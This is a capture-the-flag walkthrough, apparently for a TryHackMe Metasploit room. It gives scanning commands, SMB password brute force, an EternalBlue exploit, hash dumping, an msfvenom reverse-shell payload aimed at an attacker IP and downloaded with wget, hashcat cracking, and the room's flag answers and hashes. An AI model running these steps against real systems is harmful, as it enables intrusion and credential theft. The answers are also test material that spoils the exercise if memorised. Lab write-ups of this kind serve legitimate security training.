Skip to content

Metasploit: Exploitation Banner

Metasploit: Exploitation Logo

Metasploit: Exploitation

This guide contains the answer and steps necessary to get to them for the Metasploit: Exploitation room.

Table of contents

Scanning

  1. How many ports are open on the target system?
use auxiliary/scanner/portscan/tcp

Portscan

Click for answer5

  1. Using the relevant scanner, what NetBIOS name can you see?
use auxiliary/scanner/discovery/udp_sweep

Netbios

Click for answerACME IT SUPPORT

  1. What is running on port 8000?
nmap -sV 10.10.162.76

Nmap

Click for answerWebFS/1.21

  1. What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task. 
use auxiliary/scanner/smb/smb_login

Smb

Click for answerleo1234

The Metasploit Database

Lets try yo replicate what they are doing. First we need to start the databases and then Metasploit.

systemctl start postgresql

sudo msfdb init

Initialize

Now we can interact with the database with the following commands:

db_status                  -> Check datanase status
workspace                  -> List workspaces
workspace -a tryhackme     -> Add a workspace
workspace default          -> Cange active workspace

Msf

db_nmap -p- 10.10.162.76   -> Perform an nmap scan and output results to the database

Scan

Vulnerability Scanning

  1. Who wrote the module that allows us to check SMTP servers for open relay?

Look the the corresponding module and use info.

use auxiliary/scanner/smtp/smtp_relay
info

Smtp

Click for answerCampbell Murray

Exploitation

  1. Exploit one of the critical vulnerabilities on the target VM

We can do some scans to look for particular vulnerabilities. One easy thing to check is the host OS version.

Host

Looks like this might be vulnerable to the Eternal Blue exploit.

use exploit/windows/smb/ms17_010_eternalblue

Exploited

  1. What is the content of the flag.txt file?

Search through the user folder to find and read the flag.

Flag

Click for answerTHM-5455554845

  1. What is the NTLM hash of the password of the user "pirate"?
use post/windows/gather/hashdump

Hash

Click for answer8ce9a3ebd1647fcc5e04025019f4b875

Msfvenom

  1. Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type "sudo su" to get a root shell, this will make things easier.
ssh murphy@10.10.164.113

User the provided password to log in. Then switch to the root user with: sudo su.

  1. Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.18.78.136 lport=1337 -f elf -o shell.elf

Creation

  1. Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_MACHINE_IP:9000/shell.elf to download it to the target machine).
On our attackbox:
python -m http.server 8080

On the target machine:
wget 10.18.78.136:8080/shell.elf

Transfer

  1. Get a meterpreter session on the target machine.

First set up the handler in Metasploit, then change the file permission, and lastly, run the file on the target machein.

use exploit/multi/handler

Handler

chmod +x shell.elf

./shell.elf

Run

Connection

  1. Use a post exploitation module to dump hashes of other users on the system.
use post/linux/gather/hashdump

Hash

  1. What is the other user's password hash?

The hash can be found in the previous image. However, we could even go a step furter and try to crack the hash with hashcat.

echo '$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0' > passwd.hash

hashcat -a 3 passwd.hash /usr/share/wordlists/rockyou.txt

Hashcat

Click for answer$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0